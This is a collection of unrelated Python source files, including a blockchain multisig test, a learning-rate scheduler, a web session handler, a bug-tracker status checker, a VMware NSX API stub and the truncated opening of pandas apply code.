self.nodes[0].importprivkey(priv_keys[1])
multisig_addr_new = self.nodes[0].addmultisigaddress(2, addrs, "multisigaccount2")['address']
assert_equal(multisig_addr_new, 'QZ974ZrPrmqMmm1PSVp4m8YEgo3bCQZBbe')
multisig_addr_old = "2N5nLwYz9qfnGdaFLpPn3gS6oYQbmLTWPjq"
# Let's send to the old address. We can then find it in the
# new address with the new client. So basically the old
# address and the new one are the same thing.
txid = self.nodes[1].sendtoaddress(multisig_addr_old, 1)
self.nodes[1].generate(1)
self.sync_all()
tx = self.nodes[2].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr_new in dest_addrs)
assert(multisig_addr_old not in dest_addrs)
# Spend from the new multisig address
addr4 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr4, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.4)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr4)
if __name__ == '__main__':
ScriptAddress2Test().main()
|
py | b4110a8a71ddb134fdb435fc77828aef4a65a112 | import warnings
from torch.optim.lr_scheduler import _LRScheduler
class WarmupWarpper(_LRScheduler):
"""
"""
def __init__(self, scheduler, warmup_steps, total_num_update_steps, last_epoch=-1):
self.scheduler = scheduler
self.warmup_steps = warmup_steps
self.total_num_update_steps = total_num_update_steps
self.finished = False
super().__init__(scheduler.optimizer, last_epoch)
def get_lr(self):
if self.last_epoch > self.total_num_update_steps:
if not self.finished:
self.finished = True
return self.scheduler.get_last_lr()
elif self.last_epoch < self.warmup_steps:
multiplier = float(self.last_epoch) / float(max(1, self.warmup_steps))
return [lr * multiplier for lr in self.base_lrs]
else:
return self.scheduler.get_last_lr()
def step(self):
if self.last_epoch < self.warmup_steps:
super().step()
elif self.last_epoch < self.total_num_update_steps:
self.scheduler.step()
self._last_lr = self.scheduler.get_last_lr()
self.last_epoch += 1
else:
if self.last_epoch == self.total_num_update_steps:
warnings.warn("Learning rate scheduler steps have exceeded total_num_update_steps!")
super().step()
|
py | b4110b4d04ce90f3129fee5bd5796b66a63739f3 | import json
import logging
import re
import traceback
from datetime import datetime
import torndsession.sessionhandler
from . import error as err
from . import cache, vo
from .. import config
class Handler(torndsession.sessionhandler.SessionBaseHandler):
def prepare(self):
super().prepare()
logger = logging.getLogger('app')
logger.debug('{} {} {} {}'.format(
self.request.method, self.request.path,
self.request.arguments, self.request.headers))
def get_current_user(self):
return self.session.get('user', None)
def write_error(self, status_code, **kwargs):
if self.settings.get('serve_traceback') and 'exc_info' in kwargs:
message = traceback.format_exception(*kwargs['exc_info'])
else:
message = self._reason
error = err.Error(message)
return self.response_json(error, status_code)
def response_json(self, error=None, status_code=200, **kwargs):
data = {
'code': err.ERROR_CODE_OK,
'message': ''
}
if error:
data['code'] = error.code
data['message'] = (
error.message if (config.DEBUG and error.message) else
err.MESSAGES.get(error.code, '')
)
data.update(kwargs)
ua = self.request.headers.get('User-Agent', '')
if re.match(r'.+\s+MSIE\s+.+', ua):
content_type = 'text/html; charset=utf-8'
else:
content_type = 'application/json; charset=utf-8'
content = json.dumps(
vo.jsonable(data),
indent=(None if not config.DEBUG else 4),
ensure_ascii=False)
self.response(content, content_type, status_code)
def response_html(self, template, error=None, status_code=200, **kwargs):
data = {
'code': err.ERROR_CODE_OK,
'message': ''
}
if error:
data['code'] = error.code
data['message'] = (
error.message if (config.DEBUG and error.message) else
err.MESSAGES.get(error.code, '')
)
data.update(kwargs)
content = self.render_string(template, **data)
content_type = 'text/html; charset=utf-8'
self.response(content, content_type, status_code)
def response(self, content, content_type, status_code=200):
self.set_status(status_code)
self.set_header('Content-Type', content_type)
self.finish(content)
|
py | b4110b6ce5f00123b8ec8100f6f7ce5f3d3ea79b | #!/usr/bin/env python3
from math import sqrt
import fileinput
# Write a program that computes typical stats
# Count, Min, Max, Mean, Std. Dev, Median
# No, you cannot import any other modules!
data = []
for line in fileinput.input():
if line.startswith('#'): continue
line = line.rstrip()
data.append(float(line))
count = 0
sum = 0
for i in data:
count += 1
sum += i
mean = sum/count
s = 0
for i in data:
s += (i - mean) ** 2
sd = (s / count) ** 0.5
data.sort()
min = data[0]
max = data[-1]
if count % 2 == 0:
m = int((len(data)/2) - 1)
n = int(len(data)/2)
med = (data[m] + data[n]) / 2
else:
m = int((len(data)/2) - 0.5)
med = data[m]
print(f'Count: {count}')
print(f'Minimum: {min}')
print(f'Maximum: {max}')
print(f'Mean: {mean}')
print(f'Std. dev: {sd:.3f}')
print(f'Median: {med}')
"""
python3 stats.py numbers.txt
Count: 10
Minimum: -1.0
Maximum: 256.0
Mean: 29.147789999999997
Std. dev: 75.777
Median 2.35914
"""
|
py | b4110cb85a170a64d20bb18ccceea6057247ab9d | import re
import random
import itertools
import math
from collections import defaultdict
from src.utilities import *
from src import users, channels, status, debuglog, errlog, plog
from src.functions import get_players, get_all_players
from src.decorators import command, event_listener
from src.containers import UserList, UserSet, UserDict, DefaultUserDict
from src.messages import messages
from src.status import try_misdirection, try_exchange
@event_listener("transition_night_end", priority=5)
def on_transition_night_end(evt, var):
for blessed in get_all_players(("blessed villager",)):
status.add_protection(var, blessed, blessed, "blessed villager")
if var.NIGHT_COUNT == 1 or var.ALWAYS_PM_ROLE:
to_send = "blessed_notify"
if blessed.prefers_simple():
to_send = "blessed_simple"
blessed.send(messages[to_send])
@event_listener("myrole")
def on_myrole(evt, var, user):
if user in var.ROLES["blessed villager"]:
evt.data["messages"].append(messages["blessed_simple"])
@event_listener("get_role_metadata")
def on_get_role_metadata(evt, var, kind):
if kind == "role_categories":
evt.data["blessed villager"] = {"Village"}
# vim: set sw=4 expandtab:
|
py | b4110d4e61ca4c7da86e00bfb119f3b1f46c1d63 | import math
def square_of_sum(num):
"""Returns square of sum of N integers."""
squares = 0
for i in range(1, num + 1):
squares += i
return math.pow(squares, 2)
def sum_of_squares(num):
"""Returns sum of square of N integers."""
sums = 0
for i in range(1, num + 1):
sums += math.pow(i, 2)
return sums
def difference(num):
"""Returns difference between square_of_sum and sum_of_square
for first N integers."""
return square_of_sum(num) - sum_of_squares(num)
|
py | b4110d56557a84933b3dbbee5c38b0e0785ba00f | import pandas as pd
import os
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
import math
class idm_behavior_analysis():
'''
Purpose: Creates mesh plot of acceleration values based
on idm parameters and limits of velocity changes
:param idm_params: dictionary of all IDM params
key=parameter name => value
:param speed_limits: list containing the minimum
and maximum speeds
'''
def __init__(self, idm_params, plot_name, speed_limits = [0,100]):
self.idm_params=idm_params
self.file_location = os.getcwd() + "/IDM Behavior Plots/" + plot_name
# create linspace for both velocity inputs
self.x = np.linspace(speed_limits[0], speed_limits[1], speed_limits[1] * 10)
self.y = np.linspace(speed_limits[0], speed_limits[1], speed_limits[1] * 10)
self.v_max = speed_limits[1]
# create meshgrid for the maximum velocity (v_max) and the current velocity (v_0)
self.v, self.v_des = np.meshgrid(self.x, self.y)
self.equation()
self.create_plot()
self.create_csv()
def equation(self):
# Implement IDM behavior model equation to calculate the acceleration
self.acceleration = self.idm_params['accel']*(1-(self.v/self.v_max)**self.idm_params['delta']-((self.idm_params['minGap'] + self.idm_params['tau'] * self.v \
+ (self.v*(self.v-self.v_des))/(2*math.sqrt(self.idm_params['accel']*self.idm_params['decel'])))/self.idm_params['minGap'])**2)
self.acceleration = np.where(self.acceleration < -self.idm_params['emergencyDecel'], -self.idm_params['emergencyDecel'], self.acceleration)
return
def create_plot(self):
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.contour3D(self.v, self.v_des, self.acceleration, 50, cmap='binary')
ax.set_xlabel('IDM Velocity')
ax.set_ylabel('Desired Velocity')
ax.set_zlabel('Acceleration')
fig.savefig(self.file_location)
return
def create_csv(self):
#TODO: add method to create csv, may be unnecessary
return
|
py | b4110e417306f84c43ad6107014960a97500fbf0 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# flake8: noqa
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
import argparse
import bugzilla
import logging
import sys
import xmlrpclib
import yaml
from launchpadlib.launchpad import Launchpad
LOG = logging.getLogger(__name__)
OPEN = 1
CLOSED = 2
INVALID = 3
class LaunchpadConnector(object):
def __init__(self, cachedir='/tmp/.launchpadlib/cache/'):
self.cachedir = cachedir
self.lp = Launchpad.login_anonymously('Bugs', 'production', cachedir,
version='devel')
def get_bug_status(self, bug_id):
try:
bug = self.lp.bugs[bug_id]
# We are assuming that last task have the final status
# And we cannot slice from the last
task = bug.bug_tasks[len(bug.bug_tasks) - 1]
if task:
if task.status in ['Fix Released', 'Fix Committed', 'Invalid']:
return CLOSED
else:
return OPEN
except KeyError:
LOG.error('Bug {} does not exist in launchpad'.format(bug_id))
return INVALID
class BugzillaConnector(object):
def __init__(self, url='https://bugzilla.redhat.com/xmlrpc.cgi'):
self.bugzilla = bugzilla.Bugzilla(url=url)
def get_bug_status(self, bug_id):
try:
bug = self.bugzilla.getbug(bug_id)
if bug.status == 'CLOSED':
return CLOSED
else:
return OPEN
except xmlrpclib.Fault as err:
# Fault code 102 means it's a private bug and we don't have
# permission to see, so we can't confirm if it's closed
if err.faultCode == 102:
return OPEN
LOG.error('Bug {} failed with fault code {}'.format(bug_id,
err.faultCode))
return INVALID
class VerifyBug(object):
def __init__(self):
self.bugzilla = BugzillaConnector()
self.launchpad = LaunchpadConnector()
def check_bug_status(self, url):
connector = self._get_connector(url)
bug_id = self._get_id_from_url(url)
return connector.get_bug_status(bug_id)
def is_bug_open(self, url):
status = self.check_bug_status(url)
if status in [CLOSED, INVALID]:
return False
else:
return True
def _get_id_from_url(self, url):
if 'launchpad' in url:
# The format is https://bugs.launchpad.net/tripleo/+bug/1577769
return int(url.split('/')[-1])
elif 'bugzilla' in url:
return int(url.split('=')[-1])
def _get_connector(self, url):
if 'launchpad' in url:
return self.launchpad
elif 'bugzilla' in url:
return self.bugzilla
else:
raise ValueError('Cannot find a connector for {}'.format(url))
class BugVerifyCmd(object):
def __init__(self):
self.skipped_failures = []
def parse_arguments(self, args):
parser = argparse.ArgumentParser(description='Bug verify')
parser.add_argument('--skip-file', dest='skip_file',
help='Load skip file', required=True)
parser.add_argument('--output', action='store_true',
help='Print the output')
parser.add_argument('--format', dest='output_format',
default='yaml', help='Output format',
choices=['yaml', 'txt'])
parser.add_argument('--to-file', dest='to_file',
help='Save the skip list to a file')
parser.add_argument('--report', dest='report', action='store_true',
help='Shows report at the end')
parser.add_argument('--debug', dest='debug', action='store_true',
help='Enable debug')
self.args = parser.parse_args(args)
def setup_logging(self):
level = logging.DEBUG if self.args.debug else logging.INFO
logging.basicConfig(level=level,
format='%(asctime)s %(levelname)s %(name)s: '
'%(message)s')
def load_skip_file(self):
known_failures = []
try:
with open(self.args.skip_file) as f:
skip = yaml.safe_load(f)
for t in skip.get('known_failures'):
bug = {'test': t.get('test'), 'reason': t.get('reason')}
if t.get('lp'):
bug['lp'] = t.get('lp')
if t.get('bz'):
bug['bz'] = t.get('bz')
known_failures.append(bug)
except yaml.constructor.ConstructorError:
LOG.error('Invalid yaml file {}'.format(self.args.skip_file))
except IOError:
LOG.error('File not found {}'.format(self.args.skip_file))
finally:
return known_failures
def _print_yaml(self, known_failures):
return yaml.dump({'known_failures': known_failures},
default_flow_style=False,
explicit_start=True)
def _print_txt(self, known_failures):
output = ''
for bug in known_failures:
output += '# {}\n'.format(bug.get('reason'))
output += '{}\n'.format(bug.get('test'))
return output
def get_output(self, known_failures, output_format):
output = ''
if output_format == 'txt':
output = self._print_txt(known_failures)
elif output_format == 'yaml':
output = self._print_yaml(known_failures)
else:
raise ValueError(
'Output format not supported: {}'.format(output_format))
return output
def print_output(self, known_failures, output_format):
print(self.get_output(known_failures, output_format))
def show_report(self):
print('Here\'s the original list:')
self.print_output(self.original_failures, self.args.output_format)
print('\n\n')
print('Here\'s the skipped list:')
self.print_output(self.skipped_failures, self.args.output_format)
def save_output(self, known_failures, output_format):
output = self.get_output(known_failures, output_format)
f = open(self.args.to_file, 'w')
f.write(output)
f.close()
def run(self):
known_failures = self.load_skip_file()
self.original_failures = known_failures
open_failures = []
v_bug = VerifyBug()
for bug in known_failures:
LOG.debug('Checking bug: {}'.format(bug))
if not bug.get('lp') and not bug.get('bz'):
open_failures.append(bug)
continue
bug_url = bug.get('lp') or bug.get('bz')
if not v_bug.is_bug_open(bug_url):
self.skipped_failures.append(bug)
else:
open_failures.append(bug)
if self.args.output:
self.print_output(open_failures, self.args.output_format)
if self.args.to_file:
self.save_output(open_failures, self.args.output_format)
if self.args.report:
self.show_report()
def main():
bvc = BugVerifyCmd()
bvc.parse_arguments(sys.argv[1:])
bvc.setup_logging()
bvc.run()
if __name__ == '__main__':
sys.exit(main())
|
py | b4110ea1f35fa4f8af71f3465d12492ce5bc324a | #!/usr/bin/env python
from setuptools import setup, find_packages
from os import path
this_directory = path.abspath(path.dirname(__file__))
# could add encoding='utf-8' if needed
with open(path.join(this_directory, 'cued_sf2_lab', '_version.py')) as f:
exec(f.read())
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='cued_sf2_lab',
version=__version__, # noqa: F821
license='MIT',
description='IIA Engineering SF2 Lab',
long_description=long_description,
long_description_content_type='text/markdown',
author='Areeg Emarah',
maintainer='Areeg Emarah',
maintainer_email='[email protected]',
url='https://github.com/areeg-98/IIB_project',
packages=find_packages(),
install_requires=[
'numpy',
'scipy',
'matplotlib',
'ipympl'
],
# {'package_name': 'folder_with_its_source'}
package_dir={'cued_sf2_lab': 'cued_sf2_lab'},
classifiers=[
# 'Intended Audience :: Science/Research',
# 'Topic :: Scientific/Engineering :: Mathematics',
# 'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
project_urls={
# "Bug Tracker": "https://github.com/pygae/clifford/issues",
"Source Code": "https://github.com/areeg-98/IIB_project",
},
python_requires='>=3.5',
)
|
py | b4110f0481294c69d38c3480b6d5ada765468cb2 | def palin(word):
s=""
for i in range(len(word)):
s=s+word[len(word)-i-1]
if s==word:
print word, " is a Palindrome"
else:
print word," isnt a palindrome"
|
py | b4111001692f1d66f43fa04098ad0c86c8b7b98a | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2019 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.serviceinsertion.services.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class ServiceInstances(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.serviceinsertion.services.service_instances'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ServiceInstancesStub)
def create(self,
service_id,
base_service_instance,
):
"""
Adds a new Service-Instance under the specified Service.
:type service_id: :class:`str`
:param service_id: (required)
:type base_service_instance: :class:`vmware.vapi.struct.VapiStruct`
:param base_service_instance: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseServiceInstance
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'service_id': service_id,
'base_service_instance': base_service_instance,
})
def delete(self,
service_id,
service_instance_id,
):
"""
Delete existing Service-Instance for a given Service-Insertion Service.
:type service_id: :class:`str`
:param service_id: (required)
:type service_instance_id: :class:`str`
:param service_instance_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'service_id': service_id,
'service_instance_id': service_instance_id,
})
def get(self,
service_id,
service_instance_id,
):
"""
Returns Service-Instance information for a given Service-Insertion
Service.
:type service_id: :class:`str`
:param service_id: (required)
:type service_instance_id: :class:`str`
:param service_instance_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseServiceInstance
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'service_id': service_id,
'service_instance_id': service_instance_id,
})
def list(self,
service_id,
):
"""
Returns all Service-Instance(s) for a given Service-Insertion Service.
:type service_id: :class:`str`
:param service_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ServiceInstanceListResult`
:return: com.vmware.nsx.model.ServiceInstanceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'service_id': service_id,
})
def update(self,
service_id,
service_instance_id,
base_service_instance,
):
"""
Modifies an existing Service-Instance for a given Service-Insertion
Service.
:type service_id: :class:`str`
:param service_id: (required)
:type service_instance_id: :class:`str`
:param service_instance_id: (required)
:type base_service_instance: :class:`vmware.vapi.struct.VapiStruct`
:param base_service_instance: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseServiceInstance
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'service_id': service_id,
'service_instance_id': service_instance_id,
'base_service_instance': base_service_instance,
})
class _ServiceInstancesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'base_service_instance': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances',
request_body_parameter='base_service_instance',
path_variables={
'service_id': 'service-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'service_instance_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances/{service-instance-id}',
path_variables={
'service_id': 'service-id',
'service_instance_id': 'service-instance-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'service_instance_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances/{service-instance-id}',
path_variables={
'service_id': 'service-id',
'service_instance_id': 'service-instance-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances',
path_variables={
'service_id': 'service-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'service_instance_id': type.StringType(),
'base_service_instance': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances/{service-instance-id}',
request_body_parameter='base_service_instance',
path_variables={
'service_id': 'service-id',
'service_instance_id': 'service-instance-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceInstanceListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.serviceinsertion.services.service_instances',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'ServiceInstances': ServiceInstances,
'service_instances': 'com.vmware.nsx.serviceinsertion.services.service_instances_client.StubFactory',
}
|
py | b41110f3824c27b45651015e1e402b05c9f1322d | from __future__ import annotations
import abc
from collections import defaultdict
from functools import partial
import inspect
import re
from typing import (
TYPE_CHECKING,
Any,
Callable,
DefaultDict,
Dict,
Hashable,
Iterable,
Iterator,
List,
Sequence,
cast,
)
import warnings
import numpy as np
from pandas._config import option_context
from pandas._libs import lib
from pandas._typing import (
AggFuncType,
AggFuncTypeBase,
AggFuncTypeDict,
AggObjType,
Axis,
NDFrameT,
)
from pandas.util._decorators import cache_readonly
from pandas.util._exceptions import find_stack_level
from pandas.core.dtypes.cast import is_nested_object
from pandas.core.dtypes.common import (
is_dict_like,
is_extension_array_dtype,
is_list_like,
is_sequence,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCNDFrame,
ABCSeries,
)
from pandas.core.algorithms import safe_sort
from pandas.core.base import (
DataError,
SelectionMixin,
SpecificationError,
)
import pandas.core.common as com
from pandas.core.construction import (
array as pd_array,
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
)
if TYPE_CHECKING:
from pandas import (
DataFrame,
Index,
Series,
)
from pandas.core.groupby import GroupBy
from pandas.core.resample import Resampler
from pandas.core.window.rolling import BaseWindow
ResType = Dict[int, Any]
def frame_apply(
obj: DataFrame,
func: AggFuncType,
axis: Axis = 0,
raw: bool = False,
result_type: str | None = None,
args=None,
kwargs=None,
) -> FrameApply:
"""construct and return a row or column based frame apply object"""
axis = obj._get_axis_number(axis)
klass: type[FrameApply]
if axis == 0:
klass = FrameRowApply
elif axis == 1:
